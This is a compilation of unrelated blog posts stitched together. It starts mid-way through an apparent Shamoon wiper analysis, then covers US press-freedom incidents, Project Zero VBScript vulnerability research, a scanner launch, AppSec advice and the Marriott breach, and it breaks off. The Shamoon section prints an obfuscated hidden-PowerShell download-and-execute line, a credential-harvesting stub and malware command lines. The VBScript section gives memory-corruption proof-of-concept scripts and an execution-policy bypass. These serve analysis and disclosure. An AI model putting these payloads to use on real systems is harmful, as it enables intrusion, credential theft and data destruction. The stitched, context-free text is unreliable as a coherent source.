KoORGlicmMHtWdp = “(‘*****.ps1’)‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

The preceding script opens a command shell on the victim’s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.

We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:

function primer {

if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}




With legitimate credentials to a network it is easy to login and spread the wipers.

.Net tool kit

The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.

This first component (OCLC.exe) reads two text files stored in two local directories. Directories “shutter” and “light” contain a list of targeted machines.

OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.

The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.

The spreader places the executable files (Shamoon and Filerase) into the folder Net2.

It creates a folder on remote computers: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

The spreader copies the executables into that directory.

It runs the executables on the remote machine by creating a batch file in the administrative share \\RemoteMachine\admin$\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.

If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.

The following screenshot shows the “execute” function:

If the executable files are not present in the folder Net2, it checks the folders “all” and Net4.

To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.

The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.

The wiper contains three options:

  • SilentMode: Runs the wiper without any output.
  • BypassAcl: Escalates privileges. It is always enabled.
  • PrintStackTrace: Tracks the number of folders and files erased.

The BypassAcl option is always “true” even if the option is not specified. It enables the following privileges:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

To find a file to erase, the malware uses function GetFullPath to get all paths.

It erases each folder and file.

The malware browses every file in every folder on the system.

To erase all files and folders, it first removes the “read only’ attributes to overwrite them.

It changes the creation, write, and access date and time to 01/01/3000 at 12:01:01 for each file.

The malware rewrites each file two times with random strings.

It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.

Then it uses FILE_DISPOSITION_INFORMATION to delete the files.

The function ProcessTracker has been coded to track the destruction.


In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the “tool kit” approach, the attackers can spread the wiper module through the victims’ networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.

Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.

When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its report), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.



The files we detected during this incident are covered by the following signatures:

  • Trojan-Wiper
  • RDN/Generic.dx
  • RDN/Ransom

Indicators of compromise


  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and filenames

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\\Windows\System32\Program Files\Internet Explorer\Signing
  • \\admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

Some command lines

  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c “ping -n 30 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
  • MaintenaceSrv32.exe service






The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

The U.S. Press Freedom Tracker in 2018: Year two of documenting attacks on the press in the Trump era


Footage from a Denver police officer's body camera shows officers handcuffing Colorado Independent editor Susan Greene.

In June, a man entered the newsroom of the Capital Gazette in Annapolis, Maryland, and shot and killed four journalists and a media worker. Their names were Rob Hiaasen, Gerald Fischman, John McNamara, Wendi Winters, and Rebecca Smith. It emerged later that the shooter had been harassing and threatening the Gazette for years.

Earlier this year, a independent music journalist Zachary Stoner was also shot and killed, bringing the total number of members of the press killed in 2018 in the United States to five. (The US Press Freedom Tracker has not established the motive in the murder of Stoner, but there are some indications that it could be related to his work.)

Before 2018, the last time a journalist was killed in direct reprisal for their work in the United States was in 2007, with the murder of Oakland-based reporter Chauncey Bailey. In 2017, when the US Press Freedom Tracker—a reporting website and database attempting to systematically document press freedom violations in the United States—launched, we did not anticipate the need to track the number of murdered journalists, or to add a “killed” tag to the Tracker’s incident database.

The journalistic landscape in the United States is volatile, and 2018 has been a harrowing year for press freedom. The Tracker has documented more than 100 press freedom incidents since January, from murders and physical attacks to stops at the border and legal orders.

2018 saw an aggressive uptick in the number of leak investigations by the Trump administration compared to 2017. Five government employees or contractors have been charged with allegedly sharing information with the press—Reality Winner, Terry Albury, Joshua Schulte, James Wolfe, and Natalie Mayflower Sours Edwards—and there could be others that have not been publicly reported.

Fewer journalists were arrested in 2018 than 2017, which was marked with high levels of protests, at which numerous members of the press were arrested. Though the number is still disturbing: at least 11 journalists were arrested while doing their jobs this year. In 2018, journalists were also arrested at protests, but others were arrested while documenting police interactions and courtroom proceedings.

Leak cases

Cases counted in 2017: 1
Cases in 2018: 4

Since 2008, the United States government has aggressively prosecuted journalistic sources. In eight years, the Obama Justice Department brought charges against at least eight people accused of leaking to journalists—Thomas Drake, Shamai Leibowitz, Stephen Kim, Chelsea Manning, Donald Sachtleben, Jeffrey Sterling, John Kiriakou, and Edward Snowden.

At the end of 2017, the Trump Justice Department prosecuted one government contractor in connection with a leak case—Reality Winner. But by the end of 2018, the Tracker has documented another four cases—a significant uptick bringing the total number of prosecutions under Trump up to five.  

Terry Albury became the first person to be charged under the Espionage Act in 2018. In April, he pled guilty to disclosing confidential government information, and was sentenced in October to four years in prison. While the news organization in question was not named in the charges against Albury, reporting has identified it as The Intercept, and he is assumed to have shared information about targeted FBI surveillance of minorities and monitoring of journalists.


Terry Albury

The most recent known leak case is that of Treasury official Natalie Mayflour Sours Edwards— who was arrested and charged in October, and stands accused of giving details about suspicious banking transactions to a reporter at BuzzFeed News. The Justice Department has indicated they are investigating dozens more.

Legal orders and subpoenas

Cases counted in 2017: 6
Cases in 2018: 21

The Tracker counts legal orders that are made by state and federal government agencies against journalists, such as subpoenas by prosecutors for journalists to produce their reporting materials or testify in court. This could also include legal orders by private entities on the behalf of public officials—such as an October subpoena by a private attorney for a Chicago police officer for Jamie Kalven, an independent journalist to testify in a trial.

Kalven fought the subpoena—arguing that reporter’s privilege protects him from testifying about his reporting—and won. It wasn’t the first time—Kalven was also subpoenaed to testify and reveal his confidential sources at the end of 2017 in a different case.

The Department of Homeland Security also subpoenaed the editor of an immigration law journal in an attempt to identify the source of a leaked ICE memo, which the editor of the journal had published.

The Tracker has documented a total of 27 subpoena or legal order cases—with 21 of those occurring in 2018. It’s likely that many subpoenas are not reported, and many legal orders for journalists’ records are conducted with high levels of secrecy. Therefore, the number of legal order and subpoena cases counted by the Tracker are likely to be a severe undercount, making a straight comparison of the data between years sometimes difficult.

2018 also saw the first publicly known seizure by the Trump administration of a journalist’s communications records, when the Department of Justice seized years of New York Times reporter Ali Watkins’ phone and email records as part of an investigation into her confidential sources. She was notified of this seizure after the fact, so she had no way to challenge the seizure in court.

Physical attacks
Cases in 2017: 53
Cases in 2018: 35

Across the country, journalists were attacked and interfered with by police and protesters in the course of their reporting. A freelance journalist was ‘decked in the face’ by a police officer in August, and a police officer body-slammed and shoved other reporters covering the same rally. On other occasions, journalists were pushed to the ground and shot with “less-lethal” rounds by police.

And reporters were also attacked by far-right protesters covering rallies in 2018—such as Portland Mercury reporter Kelly Kenoyer, who was shoved in July by a right wing demonstrator, and independent journalist Jon Ziegler, who was struck by white nationalists with a shield while reporting in January.

It’s a physical attack when a journalist faces violence, injury, equipment damage, or aggressive interference as the result of a targeted act by a public or private individual. We’ve documented 35 such incidents this year.

When explosive devices were sent to CNN headquarters in New York City in October, this also comprised a physical attack. The entire bureau was quickly evacuated and the NYPD bomb squad was dispatched, and CNN employees were permitted to return once the building was cleared.

Another suspicious package addressed to CNN was found later at a post office in Georgia, near CNN’s global headquarters.


When a pipe bomb forced the evacuation of CNN's New York bureau, anchors Poppy Harlow and Jim Sciutto used cell phones to report on the situation from a street corner outside CNN's offices.

Cases in 2017: 33
Cases in 2018: 11

Journalists were arrested doing their jobs twelve times in 2018, compared to 34 in 2017. While the 2018 numbers are lower than the year before, the circumstances around the bulk of arrests are strikingly similar.

In both years, journalists were arrested at protests—specifically, fascist and anti-fascist demonstrations, and in several cases, protests in opposition to pipeline constructions. In 2017, there were two events in which large journalists were arrested—protests on Trump’s Inauguration Day in January, and protests against the Dakota Access Pipeline. There were comparatively fewer arrests in 2018.

Photojournalist Michael Nigro
was arrested while documenting an act of civil disobedience in Missouri, and Karen Savage, a freelance reporter, who was arrested multiple times in the course of covering a pipeline resistance protest in Louisiana’s Atchafalaya River Basin.

In one case, Savage said that after arresting her, sheriff’s deputies put her in the back of a police car and drove around through sugar cane fields for around an hour. “It was a very clear intimidation tactic to stop me from covering the story,” Savage said.

“I will go back,” she added. “I’m not going to let them intimidate me. It’s our job to hold these officials accountable.”

While covering a protest in Tennessee, Manuel Duran was also arrested this April. All charges against him were quickly dropped, but he was transferred to the custody of Immigration and Customs Enforcement (ICE), and has remained in ICE detention since the spring. “I was doing my work and nothing more, like any other journalist does,” he said.

And at least two journalists were arrested while taking photographs of police. Susan Greene, after photographing a police interaction in Denver, and Edgar Mendez, for “trespassing” onto police property to take pictures of squad cars for a story.

“I wondered afterwards if what happened to me was because of my brown skin, or because I was a reporter writing about the MPD,” Mendez wrote in a first-person account of the incident for the Neighborhood News Service. “You have to remember that my arrest occurred at a time when President Trump had attacked people of Hispanic descent, repeatedly declared that all the news he didn’t agree with was “fake news,” and begun to call the press the “enemy of the people,” a sentiment he continues to espouse.”

We have attempted to systematically count press freedom violations in the United States since January 2017, the month that Trump entered into office. Much of the rhetoric about the press freedom climate in the United States has focused on President Trump.

We have documented numerous threats and chilling statements by Trump, and other administration officials like ex-Attorney General Jeff Sessions, that pose serious threats to journalism in the United States.

The Trump administration has charged at least five alleged sources of journalists with crimes in less than two years in office—a pace that would shatter the Obama administration’s record on leak prosecutions. Trump has threatened his critics, seized a reporter’s communications in pursuit of her source, and blamed journalists for “creating violence.” His Department of Justice has secretly charged WikiLeaks founder Julian Assange, and if the charges in question relate to Assange’s publishing activities, the press freedom implications would be profoundly devastating. And in November, Trump revoked the press credentials of a reporter that persistently asked him a follow-up question.

But journalists faced diverse threats in the United States while reporting the news in 2018, and many of them have nothing to do with Trump. The journalistic landscape has continued to shift since we began counting incidents at the US Press Freedom Tracker, and we will continue to document threats to free expression as they evolve in coming years.

Note: The categories and cases above do not represent all of the types of incidents that the US Press Freedom Tracker documents; the Tracker catalogs incidents in more than a dozen categories, and the full database is available here. The Tracker also maintains an API endpoint and a link to easily download our data.

On VBScript

Posted by Ivan Fratric, Google Project Zero


Vulnerabilities in the VBScript scripting engine are a well known way to attack Microsoft Windows. In order to reduce this attack surface, in Windows 10 Fall Creators Update, Microsoft disabled VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. Yet this did not deter attackers from using it - in 2018 alone, there have been at least two instances of 0day attacks using vulnerabilities in VBScript: CVE-2018-8174 and CVE-2018-8373. In both of these cases, the delivery method for the exploit were Microsoft Office files with an embedded object which caused malicious VBScript code to be processed using the Internet Explorer engine. For a more detailed analysis of the techniques used in these exploits please refer to their analysis by the original discoverers here and here.

Because of this dubious popularity of VBScript, multiple security researchers took up the challenge of finding (and reporting) other instances of VBScript vulnerabilities, including a number of variants of those vulnerabilities used in the wild. Notably, researchers working with the Zero day initiative discovered multiple instances of vulnerabilities relying on VBScript Class_Terminate callback and Yuki Chen of Qihoo 360 Vulcan Team discovered multiple variants of CVE-2018-8174 (one of the exploits used in the wild).

As a follow up to those events, this blog post tries to answer the following question: Despite all of the existing efforts from Microsoft and the security community, how easy is it to still discover new VBScript vulnerabilities? And how strong are Windows policies intended to stop these vulnerabilities from being exploited?

Even more VBScript vulnerabilities

The approach we used to find VBScript vulnerabilities was quite straightforward: We used the already published Domato grammar fuzzing engine and wrote a grammar that describes the built-in VBScript functions, various callbacks and other common patterns. This is the same approach we used successfully previously to find multiple vulnerabilities in the JScript scripting engine and it was relatively straightforward to do the same for VBScript. The grammar and the generator script can be found here.

This approach resulted in uncovering three new VBScript vulnerabilities that we reported to Microsoft and are now fixed. The vulnerabilities are interesting, not because they are complex, but precisely for the opposite reason: they are pretty straightforward (yet, somehow, still survived to this day). Additionally, in several cases, there are parallels that can be drawn between the vulnerabilities used in the wild and the ones we found.

To demonstrate this, before taking a look at the first vulnerability the fuzzer found, let’s take a look at a PoC for the latest VBScript 0day found in the wild:

Class MyClass
 Dim array
 Private Sub Class_Initialize
   ReDim array(2)
 End Sub

 Public Default Property Get P
   ReDim preserve array(1)
 End Property
End Class

Set cls = new MyClass
cls.array(2) = cls

Trend Micro has a more detailed analysis, but in short, the most interesting line is

cls.array(2) = cls

In it, the left side is evaluated first and the address of variable at cls.array(2) is computed. Then, the right side is evaluated, and because cls is an object of type MyClass which has a default property getter, it triggers a callback. Inside the callback, the array is resized and the address of the variable computed previously is no longer valid - it now points to the freed memory. This results in writing to a freed memory when the line above gets executed.

Now, let’s compare this sample to the PoC for the first issue we found:

Class MyClass
 Private Sub Class_Terminate()
 End Sub
End Class

Set dict = CreateObject("Scripting.Dictionary")
Set dict.Item("foo") = new MyClass
dict.Item("foo") = 1

On the first glance, this might not appear all that similar, but in reality they are. The line that triggers the issue is

dict.Item("foo") = 1

In it, once again, the left side is allocated first and the address of dict.Item("foo") is computed. Then, a value is assigned to it, but because there is already a value there it needs to be cleared first. Since the existing value is of the type MyClass, this results in a Class_Terminate() callback, in which the dict is cleared. This, once again, causes that the address computed when evaluating the left side of the expression now points to a freed memory.

In both of these cases, the pattern is:
  1. Compute the address of a member variable of some container object
  2. Assign a value to it
  3. Assignment causes a callback in which the container storage is freed
  4. Assignment causes writing to a freed memory

The two differences between these two samples are that:
  1. In the first case, the container used was an array and in the second it was a dictionary
  2. In the first case, the callback used was a default property getter, and in the second case, the callback was Class_Terminate.

Perhaps it was because this similarity with a publicly known sample that this variant was also independently discovered by a researcher working with Trend Micro's Zero Day Initiative and Yuki Chen of Qihoo 360 Vulcan Team. Given this similarity, it would not be surprising if the author of the 0day that was used in the wild also knew about this variant.

The second bug we found wasn’t directly related to any 0days found in the wild (that we know about), however it is a classic example of a scripting engine vulnerability:

Class class1
 Public Default Property Get x
   ReDim arr(1)
 End Property
End Class

set c = new class1
arr = Array("b", "b", "a", "a", c)
Call Filter(arr, "a")

In it, a Filter function gets called on an array. The Filter function walks the array and returns another array containing just the elements that match the specified substring ("a" in this case). Because one of the members of the input array is an object with a default property getter, this causes a callback, and in the callback the input array is resized. This results in reading variables out-of-bounds once we return from the callback into the implementation of the Filter function.

A possible reason why this bug survived this long could be that the implementation of the Filter function tried to prevent bugs like this by checking if the array size is larger (or equal) than the number of matching objects at every iteration of the algorithm. However, this check fails to account for array members that do not match the given substring (such as elements with the value of "b" in the PoC).

In their advisory, Microsoft (initially) incorrectly classified the impact of this issue as an infoleak. While the bug results in an out-of-bounds read, what is read out-of-bounds (and subsequently returned to the user) is a VBScript variable. If an attacker-controlled data is interpreted as a VBScript variable, this can result in a lot more than just infoleak and can easily be converted into a code execution. This issue is a good example of why, in general, an out-of-bounds read can be more than an infoleak: it always depends on precisely what kind of data is being read and how it is used.

The third bug we found is interesting because it is in the code that was already heavily worked on in order to address CVE-2018-8174 and the variants found by the Qihoo 360 Vulcan Team. In fact, it is possible that the bug we found was introduced when fixing one of the previous issues.

We initially became aware of the problem when the fuzzer generated a sample that resulted in a NULL-pointer dereference with the following (minimized) PoC:

Dim a, r

Class class1
End Class

Class class2
 Private Sub Class_Terminate()
   set a = New class1
 End Sub
End Class

a = Array(0)
set a(0) = new class2
Erase a
set r = New RegExp
x = r.Replace("a", a)

Why does this result in a NULL-pointer dereference? This is what happens:
  1. An array a is created. At this point, the type of a is an array.
  2. An object of type class2 is set as the only member of the array
  3. The array a is deleted using the Erase function. This also clears all array elements.
  4. Since class2 defines a custom destructor, it gets called during Erase function call.
  5. In the callback, we change the value of a to an object of type class1.The type of a is now an object.
  6. Before Erase returns, it sets the value of variable a to NULL. Now, a is a variable with the type object and the value NULL.
  7. In some cases, when a gets used, this leads to a NULL-pointer dereference.

But, can this scenario be used for more than a NULL-pointer dereference. To answer this question, let’s look at step 5. In it, the value of a is set to an object of type class1. This assignment necessarily increases the reference count of a class1 object. However, later, the value of a is going to be set to NULL without decrementing the reference count. When the PoC above finishes executing, there will be an object of type class1 somewhere in memory with a reference count of 1, but no variable will actually point to it. This leads us to a reference leak scenario. For example, consider the following PoC:

Dim a, c, i

Class class1
End Class

Class class2
 Private Sub Class_Terminate()
   set a = c
 End Sub
End Class

Set c = New class1
For i = 1 To 1000
 a = Array(0)
 set a(0) = new class2
 Erase a

Using the principle described above, the PoC above will increase the reference count for variable c to 1000 when in reality only one object (variable c) will hold a reference to it. Since a reference count in VBScript is a 32-bit integer, if we increase it sufficient amount of times, it is going to overflow and the object might get freed when there are still references to it.

The above is not exactly true, because custom classes in VBScript have protection against reference count overflows, however this is not the case for built-in classes, such as RegExp. So, we can just use an object of type RegExp instead of class1 and the reference count will overflow eventually. As every reference count increase requires a callback, “eventually” here could mean several hours, so the only realistic exploitation scenario would be someone opening a tab/window and forgetting to close it - not really an APT-style attack (unlike the previous bugs discussed) but still a good example how the design of VBScript makes it very difficult to fix the object lifetime issues.

Hunting for reference leaks

In an attempt to find more reference leaks issues, a simple modification was made to the fuzzer: A counter was added and, every time a custom object was created, in the class constructor, this counter was increased. Similarly, every time an object was deleted, this counter was decreased in the class destructor. When a sample finishes executing and all variables are clear, if this counter is larger than 0, this means there was a reference leak somewhere.

This approach immediately resulted in a variant to the previously described reference leak, which is almost identical but uses ReDim instead of Erase. Microsoft responded that they are considering this a duplicate of the Erase issue.

Unfortunately there is a problem with this approach that prevents it from discovering more interesting reference leak issues: The approach can’t distinguish between “pure” reference leak issues and reference leak issues that are also memory leak issues and thus don’t necessarily have the same security impact. One example of issues this approach gets stuck on are circular references (imagine that object A has a reference to object B and object B also has reference to object A). However, we still believe that finding reference leaks can be automated as described later in this blog post.

Bypassing VBScript execution policy

As mentioned in the introduction, in Windows 10 Fall Creators Update, Microsoft disabled VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. This is certainly a step in the right direction. However, let’s also examine the weaknesses in this approach and its implementation.

Firstly, note that, by default, this policy only applies to the Internet Zone and the Restricted Sites Zone. If a script runs (or an attacker can make it run) in the Local Intranet Zone or the Trusted Sites Zone, the policy simply does not apply. Presumably this is to strike a balance between the security for the home users and business users that still rely on VBScript on their local intranet. However, it is somewhat debatable whether leaving potential gaps in the end-user security vs. having (behind-the-times) businesses that still rely on VBScript change a default setting strikes the right balance. In the future, we would prefer to see VBScript completely disabled by default in the Internet Explorer engine.

Secondly, when implementing this policy, Microsoft forgot to account for some places where VBScript code can be executed in Internet Explorer. Specifically, Internet Explorer supports MSXML object that has the ability to run VBScript code in XSL Transformations, for example like in the code below.

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"

<msxsl:script language="vbscript" implements-prefix="user">
Function xml(str)
          a = Array("Hello", "from", "VBscript")
          xml = Join(a)
End Function

<xsl:template match="/">
  <xsl:value-of select="user:xml(.)"/>


Microsoft did not disable VBScript execution for MSXML, even for websites running in the Internet Zone. This issue was reported to Microsoft and fixed at the time of publishing this blog post.

You might think that all of these issues are avoidable if Internet Explorer isn’t used for web browsing, but unfortunately the problem with VBScript (and IE in general) runs deeper than that. Most Windows applications that render web content do it using the Internet Explorer engine, as is the case with Microsoft Office that was used in the recent 0days. It should be said that, earlier this year, Microsoft disabled VBScript creation in Microsoft Office (at least the most recent version), so this popular vector has been blocked. However, there are other applications, including those from third parties, that also use IE engine for rendering web content.

Future research ideas

During this research, some ideas came up that we didn’t get around to implement. Rather than sitting on them, we’ll list them here in case a reader looking for a light research project wants to pick one of them up:

  • Combine VBScript fuzzer with the JScript fuzzer in a way that allows VBScript to access JScript objects/functions and vice-versa. Perhaps issues can be found in the interaction of these two engines. Possibly callbacks from one engine (e.g. default property getter from VBScript) can be triggered in unexpected places in the other engine.

  • Create a better tool for finding reference leaks. This could be accomplished by running IE in the debugger and setting breakpoints on object creation/deletion to track addresses of live objects. Afterwards, memory could be scanned similarly to how it was done here to find if there are any objects alive (with reference count >0) that are not actually referenced from anywhere else in the memory (note: Page Heap should be used to ensure there are no stale references from freed memory).

  • Other objects. During the previous year, a number of bugs were found that rely on Scripting.Dictionary object. Scripting.Dictionary is not one of the built-in VBScript objects, but rather needs to be instantiated using CreateObject function. Are there any other objects available from VBScript that would be interesting to fuzz?


VBScript is a scripting engine from a time when a lot of today’s security considerations weren’t in the forefront of anyone’s thoughts. Because of this, it shouldn’t be surprising that it is a crowd favorite when it comes to attacking Windows systems. And although it received a lot of attention from the security community recently, new vulnerabilities are still straightforward to find.

Microsoft made some good steps in attack surface reduction recently. However in combination with an execution policy bypass and various applications relying on Internet Explorer engine to render web content, these bugs could still endanger even users using best practices on up-to-date systems. We hope that, in the future, Microsoft is going to take further steps to more comprehensively remove VBScript from all security-relevant contexts.

Why the US South Needs You to Send More $50 Grant Bills

The Washington Post has a well researched and written story about why the US Republican party is defined by their racism. Oh, maybe I should say spoiler alert: …slavery’s enduring legacy is evident not only in statistics on black poverty and education. The institution continues to influence how white Southerners think and feel about race … Continue reading Why the US South Needs You to Send More $50 Grant Bills

Acunetix Vulnerability Scanner For Linux Now Available

Acunetix Vulnerability Scanner For Linux Now Available

Acunetix Vulnerability Scanner For Linux is now available, now you get all of the functionality of Acunetix, with all of the dependability of Linux.

Following extensive customer research, it became clear to us that a number of customers and security community professionals preferred to run on Linux. Tech professionals have long chosen Linux for their servers and computers due to its robust security. However, in recent years, this open source operating system has become much more user-friendly.

Read the rest of Acunetix Vulnerability Scanner For Linux Now Available now! Only available at Darknet.

Beyond Scanning: Don’t Let AppSec Ignorance Become Negligence

In recent months, as I’ve worked with more and more prospects and customers, I’ve started to see an interesting trend: As more agile dev teams become responsible for their own security posture, they are relying on the operations team to “plug an AppSec tool” into their CI/CD pipeline to resolve their AppSec. While I agree with the sentiment that security needs to be embedded in the build process, I am always surprised that a “tool integrated into a CI/CD pipeline” is as far as the planning typically goes. Saying that, I was told by one of my best mentors that consistency should never be a surprise.

When I ask these same teams, “once you plug a tool into your CI/CD and you get results, what are your next steps?” I am mainly met with little to no response. Basically, these teams are going from ignorance of their application security state, to knowledge of security-related defects in their code, to security negligence by not acting to address these risky defects.

I have even seen AppSec programs that check all the boxes – they have solid, prioritized app inventories; executive sponsorship; integrations; remediation and mitigation points; policy management; multiple testing techniques; and centralized reporting – yet some agile teams are stepping in and taking a “tool approach” that only focuses on scanning instead. This is not only short-sighted, but also reveals a knowledge gap surrounding what it takes to make an AppSec program successful as security hands the program to individual agile dev teams. When I check-in on these security teams, inevitably all the early momentum they leveraged to overcome cultural hurdles and foster a “security is everyone’s responsibility” mentality has come to a halt. This includes the aspirational goals around passing policy and establishing remediation checkpoints. This is not due to development doing the scanning directly (they should do this), but rather governance of the larger AppSec outcomes fading away. Ops seems more interested in how many scans they can do per day … with no further outcome.

Don’t fall into this trap. You can’t scan your way to secure code. Security teams still need to be a part of the security picture as scanning occurs in the CI/CD pipeline. Here are three key aspects of application security “beyond scanning” that will produce real risk reduction from your efforts:

Secure coding education:

The easiest flaw to fix is the one that is never introduced in the first place. However, most developers don’t have secure coding skills. While it is great to have a scanner built into the CI/CD pipeline, it is just as important now to shift testing “left.” With tools like Veracode’s Greenlight, developers can fix flaws in real time in their IDE while building their applications. In turn, developers learn as they code and reduce the number of flaws introduced over time. In addition, to help drive secure coding education, Veracode provides a number of options for sharing best practices, including instructor-led trainings such as lunch and learns, eLearning on AppSec, and developer workshops on secure coding.

Fixing what you find:

Ultimately, your AppSec program is not effective if you’re not fixing what you find. You can scan every piece of code you write, but without adequate training and guidance, you will not create more secure code. In fact, you will delay developer timelines and still produce vulnerable code. Enabling developers with both a scanning tool and remediation and mitigation guidance is key. At Veracode, we conduct over 5,000 consultation calls a year with development teams, guiding them through fixing flaws they have never had to address before. And we’ve found that after only one to two of these calls, developers’ secure coding know-how improves dramatically.

In addition, your AppSec program also needs to be set up to enable remediation guidance.

For instance, every scan completed should be assessed against a policy — not a policy that changes how you scan or what is discovered, but rather a filter of the results to see if you passed or failed based on the parameters you set for risk tolerance. This policy should also include: how often does a team need to scan, how long do they have to fix certain flaws based on severity/criticality, and what scanning techniques must be used. In addition, you need remediation time built in between scans. Just scanning multiple times a day and pulling results into a tracking system is not useful if no one has the bandwidth to fix anything. You are better off setting a realistic scanning schedule (once a day) so developers have time to fix what they find. You can increase scan frequency as you become more secure and are passing policy on a regular basis.


Can your security team help your development teams fix all the flaws their scans are finding? If you have multiple development teams working in different environments, this can be a nearly impossible task for one central security team. In addition, developers are naturally curious, so just giving them scan results without explaining the underlying technology finding the flaws will lead to push back.

Considering the skills shortage, engaging outside AppSec expertise goes a long way, both to establish your program’s goals and roadmap and keep it on track, and to guide you through fixing the flaws you find. We aren’t suggesting you replace your security team with consultants, but rather that you complement it with specialized AppSec expertise.

We’ve seen the difference this support makes: Veracode customers who work with our Security Program Managers grow their application coverage by 25 percent each year, decrease their time to deployment, and demonstrate better vulnerability detection and remediation metrics. In addition, Veracode has a fully staffed Advanced Integration Team. They work with global companies to help build out scanning in complex CI/CD environments that can vary by teams and regions. It is rare we see a one-and-done simple set-up that enables a full organization. Ultimately, our experienced Security Program Managers help you define the goals of your program, onboard and answer questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.

Learn more

Don’t let ignorance become negligence. Get details on what a mature, effective AppSec program looks like in our Everything You Need to Know About Maturing Your AppSec Program guide

Why other Hotel Chains could Fall Victim to a ‘Marriott-style’ Data Breach

A guest article authored by Bernard Parsons, CEO, Becrypt

Whilst I am sure more details behind the Marriott data breach will slowly come to light over the coming months, there is already plenty to reflect on given the initial disclosures and accompanying hypotheses.

With the prospects of regulatory fines and lawsuits looming, assimilating the sheer magnitude of the numbers involved is naturally alarming. Up to 500 million records containing personal and potentially financial information is quite staggering. In the eyes of the Information Commissioner’s Office (ICO), this is deemed a ‘Mega Breach’, even though it falls short of the Yahoo data breach. But equally concerning are the various timeframes reported.

Marriott said the breach involved unauthorised access to a database containing Starwood properties guest information, on or before 10th September 2018. Its ongoing investigation suggests the perpetrators had been inside the company’s networks since 2014.

Starwood disclosed its own breach in November 2015 that stretched back to at least November 2014. The intrusion was said to involve malicious software installed on cash registers and other payment systems, which were not part of its guest reservations or membership systems.

The extent of Marriott’s regulatory liabilities will be determined by a number of factors not yet fully in the public domain. For GDPR this will include the date at which the ICO was informed, the processes Marriott has undertaken since discovery, and the extent to which it has followed ‘best practice’ prior to, during and after breach discovery. Despite the magnitude and nature of breach, it is not impossible to imagine that Marriott might have followed best practice, albeit such a term is not currently well-defined, but it is fairly easy to imagine that their processes and controls reflect common practice.

A quick internet search reveals just how commonplace and seemingly inevitable the industry’s breaches are. In December 2016, a pattern of fraudulent transactions on credit cards were reportedly linked to use at InterContinental Hotels Group (IHG) properties. IHG stated that the intrusion resulted from malware installed at point-of-sale systems at restaurants and bars of 12 properties in 2016, and later in April 2017, acknowledging that cash registers at more than 1,000 of its properties were compromised.

According to KrebsOnSecurity other reported card breaches include Hyatt Hotels (October 2017), the Trump Hotel (July 2017), Kimpton Hotels (September 2016) Mandarin Oriental properties (2015), and Hilton Hotel properties (2015).

Therefore perhaps, the most important lessons to be learnt in response to such breaches are those that seek to understand the factors that make data breaches all but inevitable today. Whilst it is Marriott in the news this week, the challenges we collectively face are systemic and it could very easily be another hotel chain next week.

Reflecting on the role of payment (EPOS) systems and cash registers within leisure industry breaches is illustrative of the challenge. Paste the phrase ‘EPOS software’ into your favourite search engine, and see how prominent, or indeed absent, the notion of security is. Is it any wonder that organisations often unwittingly connect devices with common and often unmanaged vulnerabilities to systems that may at the same time be used to process sensitive data? Many EPOS systems effectively run general purpose operating systems, but are typically subject to less controls and monitoring than conventional IT systems.

So Why is This?
